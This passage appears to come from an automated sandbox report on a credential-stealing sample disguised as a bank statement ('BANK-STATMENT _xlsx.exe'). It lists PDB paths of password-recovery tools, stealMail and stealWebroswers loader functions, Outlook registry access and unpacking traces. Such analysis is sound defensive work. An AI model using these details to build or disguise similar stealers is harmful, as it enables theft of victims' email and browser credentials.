                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbV source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.806097073.00000000061F0000.00000004.00000001.sdmp
                Source: Binary string: Z[zTs5.pdb6 source: BANK-STATMENT _xlsx.exe, 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp
                Source: Binary string: mscorlib.pdbs\Desktop\BANK-STATMENT _xlsx.exe6 source: BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798860254.000000000097E000.00000004.00000020.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbD source: BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.774857470.0000000006760000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: .pdb* source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbd source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912269653.00000000007FB000.00000004.00000020.sdmp
                Source: Binary string: rlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbh source: BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbg source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp
                Source: Binary string: 1hoC:\Windows\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798860254.000000000097E000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882931760.0000000000847000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbV source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912269653.00000000007FB000.00000004.00000020.sdmp
                Source: Binary string: tsymbols\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: mscorlib.pdbENT _xlsx.exe source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbk source: BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: BANK-STATMENT _xlsx.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884712791.0000000002AC1000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.774885507.0000000006775000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806123008.00000000061FE000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmp
                Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: BANK-STATMENT _xlsx.exe, vbc.exe, BANK-STATMENT _xlsx.exe, 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000019.00000002.833212497.0000000000400000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbsea source: BANK-STATMENT _xlsx.exe, 0000001D.00000002.882902656.000000000081C000.00000004.00000020.sdmp
                Source: Binary string: mscorlib.pdbH source: BANK-STATMENT _xlsx.exe, 00000001.00000002.777485300.0000000007D8A000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.808147157.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862987604.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.889632651.00000000078AA000.00000004.00000010.sdmp, BANK-STATMENT _xlsx.exe, 00000022.00000002.919074712.00000000079EA000.00000004.00000010.sdmp
                Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: BANK-STATMENT _xlsx.exe, 00000001.00000002.768432901.0000000002625000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.800371357.0000000002635000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.853807140.0000000002445000.00000004.00000040.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.884255520.0000000002675000.00000004.00000040.sdmp

                Data Obfuscation:

                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                Detected unpacking (creates a PE file in dynamic memory)
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeUnpacked PE file: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack
                .NET source code contains potential unpacker
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004405C4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004405C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00440BF4 push 00440C81h; ret 0_2_00440C79
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00426050 push 0042607Ch; ret 0_2_00426074
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0041A058 push ecx; mov dword ptr [esp], edx0_2_0041A05A
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004100E4 push 00410145h; ret 0_2_0041013D
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C0F4 push 0042C120h; ret 0_2_0042C118
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C084 push 0042C0B0h; ret 0_2_0042C0A8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0040C0AE push 0040C0DCh; ret 0_2_0040C0D4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0040C0B0 push 0040C0DCh; ret 0_2_0040C0D4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C0BC push 0042C0E8h; ret 0_2_0042C0E0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00410148 push 00410349h; ret 0_2_00410341
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042614C push 00426178h; ret 0_2_00426170
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C164 push 0042C190h; ret 0_2_0042C188
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00442120 push 0044214Ch; ret 0_2_00442144
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C12C push 0042C158h; ret 0_2_0042C150
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004301C4 push 0043022Eh; ret 0_2_00430226
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C1D4 push 0042C200h; ret 0_2_0042C1F8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004661E4 push ecx; mov dword ptr [esp], ecx0_2_004661E9
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042C19C push 0042C1C8h; ret 0_2_0042C1C0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00430230 push 0043029Ah; ret 0_2_00430292
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00464314 push 00464340h; ret 0_2_00464338
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00410458 push 00410488h; ret 0_2_00410480
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0041045C push 00410488h; ret 0_2_00410480
